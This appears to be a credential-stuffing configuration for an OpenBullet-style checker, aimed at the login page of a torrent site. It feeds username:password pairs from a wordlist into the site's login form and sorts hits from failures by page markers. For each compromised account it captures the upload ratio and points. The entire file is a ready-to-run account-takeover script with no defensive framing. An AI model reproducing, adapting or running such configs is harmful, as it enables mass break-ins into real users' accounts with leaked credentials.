[SETTINGS]
{
  "Name": "TorrentAi",
  "SuggestedBots": 1,
  "LastModified": "2018-10-18T05:01:58.2175876+00:00",
  "AdditionalInfo": "KREAM KLICK ",
  "Author": "maxokream",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "http://www.torrent.ai/lt/account-login.php" AutoRedirect=TRUE 
  CONTENT "returnto=&username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Host: www.torrent.ai" 
  HEADER "Origin: http://www.torrent.ai" 
  HEADER "Referer: http://www.torrent.ai/lt/account-login.php" 
  HEADER "Upgrade-Insecure-Requests: 1" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "=\"error_text\">" 
  KEYCHAIN Success OR 
    KEY "href=\"myaccount?act=logout\"" 
PARSE "<SOURCE>" LR "<b>" "</b>" Recursive=FALSE -> CAP "Ratio" "" "" 
PARSE "<SOURCE>" LR "<b id=\"topNavPoints\">" "</b>" Recursive=FALSE -> CAP "Points" "" "" 
